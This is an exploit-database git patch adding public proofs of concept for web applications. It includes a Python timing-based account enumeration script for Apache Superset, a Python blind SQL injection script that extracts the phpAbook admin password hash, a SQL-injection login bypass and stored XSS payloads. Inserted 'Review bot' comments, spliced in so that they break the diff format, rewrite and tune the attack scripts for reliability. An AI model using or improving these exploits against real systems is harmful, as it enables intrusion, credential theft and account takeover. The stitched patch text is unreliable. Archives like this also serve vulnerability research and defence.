From 293ca2aadb8c3cf63598b433b85ea25d300b4581 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 1 Jul 2021 05:01:57 +0000
Subject: [PATCH] DB: 2021-07-01
6 changes to exploits/shellcodes
SAS Environment Manager 2.5 - 'name' Stored Cross-Site Scripting (XSS)
Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass)
phpAbook 0.9i - SQL Injection
Apache Superset 1.1.0 - Time-Based Account Enumeration
Simple Traffic Offense System 1.0 - Stored Cross Site Scripting (XSS)
---
 exploits/multiple/webapps/50067.txt | 28 -------------
 exploits/multiple/webapps/50072.py | 64 +++++++++++++++++++++++++++++
 exploits/multiple/webapps/50073.txt | 38 +++++++++++++++++
 exploits/php/webapps/50071.py | 38 +++++++++++++++++
 exploits/php/webapps/50074.txt | 14 +++++++
 files_exploits.csv | 5 ++-
 6 files changed, 158 insertions(+), 29 deletions(-)
 delete mode 100644 exploits/multiple/webapps/50067.txt
 create mode 100755 exploits/multiple/webapps/50072.py
 create mode 100644 exploits/multiple/webapps/50073.txt
 create mode 100755 exploits/php/webapps/50071.py
 create mode 100644 exploits/php/webapps/50074.txt
diff --git a/exploits/multiple/webapps/50067.txt b/exploits/multiple/webapps/50067.txt
deleted file mode 100644
index ff24e28c9..000000000
--- a/exploits/multiple/webapps/50067.txt
+++ /dev/null
@@ -1,28 +0,0 @@
-# Exploit Title: SAS Environment Manager 2.5 - 'name' Stored Cross-Site Scripting (XSS)
-# Date: 24/06/2021
-# Exploit Author: Luqman Hakim Zahari @ Saitamang
-# Vendor Homepage: https://support.sas.com/en/software/environment-manager-support.html
-# Version: 2.5
-# Tested on: CentOS 7
-# CVE : CVE-2021-35475
-
-# Description #
-
-SAS® Environment Manager 2.5 allows XSS through the Name field when creating/editing a server. The XSS will prompt when editing the Configuration Properties.
-
-# Proof of Concept(PoC) # https://github.com/saitamang/CVE-2021-35475/blob/main/README.md
-
-*Steps to Reproduce:*
-
-[1.] Login to your system > On "Resource" tab > "Browse""
-[2.] Choose a "Platform"
-[3.] Click "Inventory" tab > Under "Servers" tab click "New..."
-[4.] Under "General Properties" tab on "Name" field , enter the payload(below) > Filled up other information and click "Ok" button
-
-payload :
-
-name=XSS">@SAITAMANG
-
-[5.] Successfully saved the payload page will shown
-[6.] Then scroll down to bottom under "Configuration Properties" tab > click "Edit" button
-[7.] Then the payload will be executed
\ No newline at end of file
diff --git a/exploits/multiple/webapps/50072.py b/exploits/multiple/webapps/50072.py
new file mode 100755
index 000000000..995b2e9bf
--- /dev/null
+++ b/exploits/multiple/webapps/50072.py
@@ -0,0 +1,64 @@
+# Exploit Title: Apache Superset 1.1.0 - Time-Based Account Enumeration
+# Author: Dolev Farhi
+# Date: 2021-05-13
+# Vendor Homepage: https://superset.apache.org/
+# Version: 1.1.0
+# Tested on: Ubuntu
+
+import sys
+import requests
+import time
+
+scheme = 'http'
+host = '192.168.1.1'
+port = 8080
+
+# change with your wordlist
+usernames = ['guest', 'admin', 'administrator', 'idontexist', 'superset']
+
+url = '{}://{}:{}'.format(scheme, host, port)
+login_endpoint = '/login/'
+
+session = requests.Session()
+
+def get_csrf():
+ token = None
+ r = session.get(url + login_endpoint, verify=False)
+
+ for line in r.text.splitlines():
+ if 'csrf_token' in line:
+ try:
+ token = line.strip().split('"')[-2]
+ except:
+ pass
+ return token
+
+csrf_token = get_csrf()
+
+if not csrf_token:
+ print('Could not obtain CSRF token, the exploit will likely fail.')
+ sys.exit(1)
+
+data = {
+ 'csrf_token':csrf_token,
+ 'username':'',
+ 'password':'abc'
+}
+
+attempts = {}
+found = False
+
+for user in usernames:
+ start = time.time()
+ data['username'] = user
+ r = session.post(url + login_endpoint, data=data, verify=False, allow_redirects=True)
+ roundtrip = time.time() - start
+ attempts["%.4f" % roundtrip] = user
+
+print('[!] Accounts existence probability is sorted from high to low')
+
+count = 0
+
+for key in sorted(attempts, reverse=True):
+ count += 1
+ print("%s. %s (timing: %s)" % (count, attempts[key], key))
\ No newline at end of file
diff --git a/exploits/multiple/webapps/50073.txt b/exploits/multiple/webapps/50073.txt
new file mode 100644
index 000000000..8affacfd8
--- /dev/null
+++ b/exploits/multiple/webapps/50073.txt
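Review bot: In the probe loop, `attempts["%.4f" % roundtrip] = user` keys the table by the timing string, so two usernames whose round-trips agree to four decimals overwrite each other and one silently disappears from the ranking; key by username and sort by value instead. Each username is also measured exactly once, and a single HTTP round-trip is dominated by network jitter rather than whatever server-side difference the script is trying to observe, so take several samples per user and rank by the median. `found = False` is never read and can be dropped, and the bare `except:` in `get_csrf` should be `except IndexError:` so a real failure is not hidden. The rewrite below replaces the measurement loop and the output loop; the CSRF fetch and request template are unchanged.
```python
# … unchanged: CSRF fetch, data template …
SAMPLES_PER_USER = 5
attempts = {}

for user in usernames:
    data['username'] = user
    samples = []
    for _ in range(SAMPLES_PER_USER):
        start = time.time()
        session.post(url + login_endpoint, data=data, verify=False, allow_redirects=True)
        samples.append(time.time() - start)
    # median of several samples smooths single-request jitter; one entry per user, so no key collisions
    attempts[user] = sorted(samples)[len(samples) // 2]

print('[!] Accounts existence probability is sorted from high to low')

ranked = sorted(attempts.items(), key=lambda kv: kv[1], reverse=True)
for rank, (user, roundtrip) in enumerate(ranked, 1):
    print("%s. %s (timing: %.4f)" % (rank, user, roundtrip))
```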
@@ -0,0 +1,38 @@
+# Exploit Title: Simple Traffic Offense System 1.0 - 'Multiple' Stored Cross Site Scripting (XSS)
+# Date: 30-06-2021
+# Exploit Author: Barış Yıldızoğlu
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/trafic.zip
+# Version: 1.0
+# Tested on: Windows 10 Home 64 Bit + Wampserver Version 3.2.3
+
+# Description: Almost all inputs contain Stored XSS on the website
+
+Request:
+
+POST /Trafic/save-reported.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
+Firefox/78.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 168
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/Trafic/report-offence.php
+Cookie: PHPSESSID=vbsq5n2m09etst1mfcmq84gifo
+Upgrade-Insecure-Requests: 1
+
+offence_id={Payload here}&vehicle_no={Payload here}&driver_license={Payload
+here}&name={Payload here}&address={Payload here}&gender={Payload
+here}&officer_reporting={Payload here}&offence={Payload here}
+
+
+# Steps to Reproduce:
+[1.] Login to the system [+] username=Torrahclef&pass=yemiyemi
+[2.] Go to the Report Offense page
+[3.] Send the request above with the Stored XSS payload
+[4.] Dashboard and Offense list pages will be triggered
\ No newline at end of file
diff --git a/exploits/php/webapps/50071.py b/exploits/php/webapps/50071.py
new file mode 100755
index 000000000..9d15045c2
--- /dev/null
+++ b/exploits/php/webapps/50071.py
@@ -0,0 +1,38 @@
+# Exploit Title: phpAbook 0.9i - SQL Injection
+# Date: 2021-06-29
+# Vendor Homepage: http://sourceforge.net/projects/phpabook/
+# Exploit Author: Said Cortes, Alejandro Perez
+# Version: v0.9i
+# This was written for educational purpose. Use it at your own risk.
+# Author will be not responsible for any damage.
+
+import requests
+import argparse
+import string
+import sys
+
+
+def exploit(session,host):
+ print("Starting Exploit\nSearching Admin Hash...")
+ passwordhash = ''
+ for i in range(1,33):
+ charset = string.digits + string.ascii_lowercase
+ for letter in charset:
+ burp0_url = f"{host}/index.php"
+ burp0_data = {"auth_user": f"admin'-IF((SELECT MID(password,{i},1) from ab_auth_user where uid=1)='{letter}',SLEEP(3),0)#", "auth_passwd": "admin", "lang": "en", "submit": "Login"}
+ try:
+ session.post(burp0_url, data=burp0_data, timeout=1)
+ except requests.Timeout:
+ passwordhash += letter
+ continue
+ print("admin:"+passwordhash)
+
+
+
+
+if __name__ == "__main__" :
+ session = requests.session()
+ parser = argparse.ArgumentParser()
+ parser.add_argument("-u","--url",help="host url \nex: http://127.0.0.1/phpabook",required=True)
+ arg = parser.parse_args()
+ exploit(session,arg.url)
\ No newline at end of file
diff --git a/exploits/php/webapps/50074.txt b/exploits/php/webapps/50074.txt
new file mode 100644
index 000000000..e32dd34b4
--- /dev/null
+++ b/exploits/php/webapps/50074.txt
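Review bot: The inner `for letter in charset` loop in `exploit` never stops after a hit, so once the `requests.Timeout` branch has recorded a position's character the remaining letters are still sent, and any of them that crosses the 1-second timeout for ordinary latency reasons appends a second character to `passwordhash`, shifting every position after it; the `continue` there should be `break`. `requests.Timeout` is also the parent of `ConnectTimeout`, so an unreachable host is counted as a found character — catch `requests.ReadTimeout` instead — and `timeout=1` against `SLEEP(3)` leaves no margin for a baseline response that is merely slow, so measure one un-injected request first and set the timeout between that and the injected delay. `range(1,33)` with a digits-plus-lowercase charset presumably assumes a 32-character hex hash in `ab_auth_user.password`; confirm against the schema and report a position that produced no hit, e.g. `if len(passwordhash) != 32: print("incomplete hash, check timing")` before the final print.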
@@ -0,0 +1,14 @@
+# Exploit Title: Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass)
+# Date: 06/30/2021
+# Exploit Author: Murat DEMIRCI (butterflyhunt3r)
+# Vendor Homepage: https://www.codester.com/
+# Software Link: https://www.codester.com/items/31349/medisol-doctors-patients-managment-system
+# Version: 1.0
+# Tested on: Windows 10
+# Description : The admin login of this app is vulnerable to sql injection login bypass. Anyone can bypass admin login authentication.
+
+# Proof of Concept :
+http://test.com/PATH/signin
+
+# Username : anything
+# Password : ' or '1'='1
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 9f234fed9..8d9dcac83 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44207,6 +44207,9 @@ id,file,description,date,author,type,platform,port
 50063,exploits/php/webapps/50063.txt,"Simple Client Management System 1.0 - 'uemail' SQL Injection (Unauthenticated)",2021-06-25,"Barış Yıldızoğlu",webapps,php,
 50064,exploits/php/webapps/50064.rb,"Lightweight facebook-styled blog 1.3 - Remote Code Execution (RCE) (Authenticated) (Metasploit)",2021-06-25,"Maide Ilkay Aydogdu",webapps,php,
 50066,exploits/php/webapps/50066.txt,"WordPress Plugin YOP Polls 6.2.7 - Stored Cross Site Scripting (XSS)",2021-06-28,"Toby Jackson",webapps,php,
-50067,exploits/multiple/webapps/50067.txt,"SAS Environment Manager 2.5 - 'name' Stored Cross-Site Scripting (XSS)",2021-06-28,"Luqman Hakim Zahari",webapps,multiple,
+50074,exploits/php/webapps/50074.txt,"Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass)",2021-06-30,"Murat DEMİRCİ",webapps,php,
 50068,exploits/macos/webapps/50068.txt,"Atlassian Jira Server/Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS)",2021-06-28,Captain_hook,webapps,macos,
 50069,exploits/hardware/webapps/50069.py,"Netgear WNAP320 2.0.3 - 'macAddress' Remote Code Execution (RCE) (Unauthenticated)",2021-06-28,"Bryan Leong",webapps,hardware,
+50071,exploits/php/webapps/50071.py,"phpAbook 0.9i - SQL Injection",2021-06-30,"Alejandro Perez",webapps,php,
+50072,exploits/multiple/webapps/50072.py,"Apache Superset 1.1.0 - Time-Based Account Enumeration",2021-06-30,"Dolev Farhi",webapps,multiple,
+50073,exploits/multiple/webapps/50073.txt,"Simple Traffic Offense System 1.0 - Stored Cross Site Scripting (XSS)",2021-06-30,"Barış Yıldızoğlu",webapps,multiple,